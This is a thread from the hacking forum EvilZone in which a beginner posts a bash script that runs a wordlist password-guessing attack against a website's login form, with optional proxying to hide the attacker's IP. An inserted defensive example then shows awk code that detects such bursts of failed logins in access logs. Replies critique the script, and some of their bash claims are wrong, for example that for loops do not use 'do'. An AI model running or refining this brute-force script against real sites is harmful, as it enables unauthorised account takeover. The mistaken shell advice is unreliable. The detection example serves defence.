EvilZone
Programming and Scripting => Beginner's Corner => : Red_Tuna August 09, 2015, 01:34:45 AM
-
So I was just trying things for fun and editing a bunch of stuff here and there and came up with this "So-Called" Dictionary attack using a shell script. Would this even work? Solved my question. Doesn't work. I'll update something new that might.
#!/usr/bin/env bash
echo
echo -n "Enter domain address of website:"
read name
echo -n "Enter username for login:"
read username
echo -n "Would you like to proxy?(Y/N)?"
read proxy
if [ $proxy == 'Y' ]
then
    echo -n "Current ip is:"
    curl ipecho.net/plain ; echo
    echo -n "Enter ip and port of proxy(EX: 189.11.2.3:8080):"
    read proxyip
    export http_proxy=http://$proxyip
    echo -n "Current ip is:"
    curl ipecho.net/plain ; echo
fi
n=`cat john.txt | wc -l`
for (( i=1; i <= $n; i++));
do
    password=`sed -n "$i"p john.txt`
    http_code=$(curl -L --data-urlencode user="$username" --data-urlencode password="$password" "$name" -w '%{http_code}' -o /dev/null -s)
    echo "Trying password: '$password'"
    if [[ $http_code -eq 302 ]]; then
        echo "Password is cracked: '$password'"
        break 2
    fi
done
Credit goes to some people's scripts I used to make some of this. 75% is mine. Give me your worst, I'm a noob.
Staff note: Next time, use the code tags if you're going to post code.
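
From the defender's side, the traffic the script in the first post is meant to generate (one login POST per wordlist entry, all from one source) stands out in a web access log. The following is an added example, not code from the thread; the log layout, the `/login` path, the threshold and the sample lines are assumptions constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag sources whose login POSTs look like password guessing.
# Assumptions (not from the thread): the access-log layout below, the login
# path /login, and a 302 meaning a successful login (as the posted script assumes).
LOGIN_PATH="/login"

# Constructed sample log lines (documentation-range IPs, invented timestamps).
sample_log() {
cat <<'EOF'
198.51.100.7 - - [09/Aug/2015:01:40:01 +0000] "POST /login HTTP/1.1" 200 1532
198.51.100.7 - - [09/Aug/2015:01:40:02 +0000] "POST /login HTTP/1.1" 200 1532
198.51.100.7 - - [09/Aug/2015:01:40:03 +0000] "POST /login HTTP/1.1" 200 1532
198.51.100.7 - - [09/Aug/2015:01:40:04 +0000] "POST /login HTTP/1.1" 200 1532
198.51.100.7 - - [09/Aug/2015:01:40:05 +0000] "POST /login HTTP/1.1" 302 0
203.0.113.20 - - [09/Aug/2015:01:41:10 +0000] "POST /login HTTP/1.1" 200 1532
203.0.113.20 - - [09/Aug/2015:01:41:25 +0000] "POST /login HTTP/1.1" 302 0
192.0.2.44 - - [09/Aug/2015:01:42:00 +0000] "POST /login HTTP/1.1" 200 1532
192.0.2.44 - - [09/Aug/2015:01:42:01 +0000] "POST /login HTTP/1.1" 200 1532
192.0.2.44 - - [09/Aug/2015:01:42:02 +0000] "POST /login HTTP/1.1" 200 1532
192.0.2.44 - - [09/Aug/2015:01:42:30 +0000] "GET /login HTTP/1.1" 200 1532
EOF
}

# detect_guessing THRESHOLD < log
# Prints "ip failures=N followed_by_success=yes|no" for every source with a run
# of at least THRESHOLD consecutive failed login POSTs. "yes" means the run
# ended in a 302, so that account should be treated as possibly compromised.
detect_guessing() {
  awk -v path="$LOGIN_PATH" -v min="$1" '
    # Fields: $1 client IP, $6 method (with leading quote), $7 path, $9 status
    $6 == "\"POST" && $7 == path {
      ip = $1
      if ($9 == 302) {
        if (run[ip] >= min) hit[ip] = 1   # success right after a long failure run
        run[ip] = 0
      } else {
        run[ip]++
        if (run[ip] > worst[ip]) worst[ip] = run[ip]
      }
    }
    END {
      for (ip in worst)
        if (worst[ip] >= min)
          printf "%s failures=%d followed_by_success=%s\n", ip, worst[ip], ((ip in hit) ? "yes" : "no")
    }' | sort
}

sample_log | detect_guessing 3
```

The single mistyped password from 203.0.113.20 stays below the threshold and is not reported; in production the same counting would normally be windowed by time and paired with rate limiting or lockout on the login endpoint.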
-
Presume it failed mainly at the loop - not a programmer, but I can see the logic is flawed. Think you'd be better loading the dict into an array and pushing on from there. At least you can loop through the words in the dict then.
So fix the loop first, then worry about sending the data.
-
Well, I don't use shell scripts for anything outside of a collection of shell commands. But, to start, using curl to set the proxy is not a good idea; it is better to proxy through the routing, layer 2 if memory serves me right. Look at ifconfig, ip, iptables, and ebtables (all commands). Curl is okay to use for web applications, but outside of that, you would be better off using distinct protocols, such as telnet, ssh, mysql, etc.
Second, I don't recall "do" being used with "for" loops; that is for "do-while" loops. Also, your curl command has it directing the output to "/dev/null", aka the blackhole. So even if it did work, you wouldn't know.
I would suggest learning C/C++/Obj-C; also, http://ss64.com/bash/ is a great place to catch a quick reference to commands. The "man" command is always useful too, same with "--help".